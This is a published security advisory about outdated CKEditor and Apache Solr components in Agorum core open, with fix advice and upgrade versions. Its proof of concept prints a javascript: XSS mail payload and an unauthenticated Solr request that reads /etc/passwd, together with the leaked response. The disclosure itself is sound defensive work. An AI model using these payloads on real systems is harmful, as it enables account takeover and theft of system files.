{"id":24280,"date":"2025-06-27T16:08:44","date_gmt":"2025-06-27T14:08:44","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0029\/"},"modified":"2025-07-01T10:29:55","modified_gmt":"2025-07-01T08:29:55","slug":"usd-2025-0029","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0029\/","title":{"rendered":"usd-2025-0029"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n

usd-2025-0029 | Agorum core open 11.9.1.3-1857 - Dependency on Vulnerable Third-Party Component<\/h1>\n

<\/h1>\n

Product<\/strong>: Agorum core open
Affected Version<\/strong>: 11.9.1.3-1857
Vulnerability Type<\/strong>: Dependency on Vulnerable Third-Party Component (CWE-1395)
Security Risk<\/strong>: Critical
Vendor<\/strong>: Agorum
Vendor URL<\/strong>: https:\/\/www.agorum.com\/<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: Requested
CVE Link<\/strong>: Requested
Advisory ID<\/strong>: usd-2025-0029<\/p>\n

Description<\/h3>\n

Agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.<\/p>\n

Proof of Concept<\/h3>\n

The application depends on third-party components that contain known and exploitable vulnerabilities.
Below are two examples of such vulnerable components, each with known public CVEs and documented exploit paths.<\/p>\n

CKEditor 4.6.2 - CVE-2024-24816<\/strong><\/p>\n

CKEditor 4 < 4.24.0-lts - XSS vulnerability in samples that use the \"preview\" feature.
https:\/\/github.com\/afine-com\/CVE-2024-24816<\/a><\/p>\n

Agroum core integrates CKEditor for its built-in mail functionality, which introduces a potential privilege escalation risk. A low-privileged user could craft an email containing malicious JavaScript and send it to an administrative user. If the administrative user opens the email, the embedded JavaScript will execute within the context of their browser session.<\/p>\n

The following payload can be used to craft a malicious mail:<\/p>\n

\n
<\/span><<\/span>p<\/span>><\/span>&gt;<\/span><\/<\/span>p<\/span>><\/span><<\/span>p<\/span>><<\/span>a<\/span> href<\/span>=<\/span>\"javascript:alert(document.domain)\"<\/span>><\/span>XSS<\/<\/span>a<\/span>><\/<\/span>p<\/span>><\/span><<\/span>p<\/span>><\/span>&nbsp;<\/span><\/<\/span>p<\/span>><\/span><\/pre>\n<\/div>\n
Apache Solr 7.7.2 - Arbitrary File Read<\/strong><\/p>\n
The application uses an outdated version of Apache Solr, which contains several known vulnerabilities. Additionally, Apache Solr is configured to allow unauthenticated access.
For instance, an unauthenticated attacker could gain access to arbitrary system files by sending the following request to the Apache Solr server:<\/p>\n
\n
<\/span>GET<\/span> \/solr\/agorumsolr01_shard1_replica_n1\/debug\/dump?stream.url=file:\/\/\/etc\/passwd&param=ContentStream<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> localhost:8981
<\/span>[...]<\/span><\/pre>\n<\/div>\n
The response reveals the content of \/etc\/passwd<\/strong>, as shown below:<\/p>\n
\n
<\/span>HTTP<\/span>\/<\/span>1.1<\/span> 200<\/span> OK
<\/span>Content-Type<\/span>:<\/span> application\/json;charset=utf-8
<\/span>Content-Length<\/span>:<\/span> 4123
<\/span>{
<\/span>  <\/span>\"responseHeader\"<\/span>:{<\/span>    
<\/span>    \"status\"<\/span>:<\/span>0<\/span>,
<\/span>    <\/span>\"QTime\"<\/span>:<\/span>2<\/span>,
<\/span>    <\/span>\"handler\"<\/span>:<\/span>\"org.apache.solr.handler.DumpRequestHandler\"<\/span>,
<\/span>    <\/span>\"params\"<\/span>:{
<\/span>      <\/span>\"param\"<\/span>:<\/span>\"ContentStream\"<\/span>,
<\/span>      <\/span>\"stream.url\"<\/span>:<\/span>\"file:\/\/\/etc\/passwd\"<\/span>}},
<\/span>  <\/span>\"params\"<\/span>:{
<\/span>    <\/span>\"stream.url\"<\/span>:<\/span>\"file:\/\/\/etc\/passwd\"<\/span>,
<\/span>    <\/span>\"echoHandler\"<\/span>:<\/span>\"true\"<\/span>,
<\/span>    <\/span>\"param\"<\/span>:<\/span>\"ContentStream\"<\/span>,
<\/span>    <\/span>\"echoParams\"<\/span>:<\/span>\"explicit\"<\/span>},
<\/span>  <\/span>\"streams\"<\/span>:[{
<\/span>      <\/span>\"name\"<\/span>:<\/span>null<\/span>,
<\/span>      <\/span>\"sourceInfo\"<\/span>:<\/span>\"url\"<\/span>,
<\/span>      <\/span>\"size\"<\/span>:<\/span>null<\/span>,
<\/span>      <\/span>\"contentType\"<\/span>:<\/span>null<\/span>,
<\/span>      <\/span>\"stream\"<\/span>:<\/span>\"root:x:0:0:root:\/root:\/usr\/bin\/zsh<\/span>[...]<\/span><\/pre>\n<\/div>\n
These two exploits serve as simple demonstrations of how outdated components can be leveraged for immediate attacks. However, the core issue lies in the use of outdated third-party libraries, which inherently expose the application to numerous known vulnerabilities. Addressing these outdated dependencies is crucial to mitigating a wide range of potential threats beyond just these examples.<\/p>\n
Fix<\/h3>\n

It is essential to regularly update and patch third-party components and libraries. This includes performing vulnerability assessments to identify outdated or unsupported dependencies, and replacing them with secure, up-to-date versions. Implementing automated tools for dependency management, such as dependency checkers or vulnerability scanners, can help proactively identify and address these issues. Additionally, consider using Software Bill of Materials (SBOM) to track and audit all third-party components and their versions in use.<\/p>\n
 <\/p>\n
Users of agorum core open can upgrade to 11.9.2 or 11.10.1.<\/p>\n
References<\/h3>\n
<\/p>\n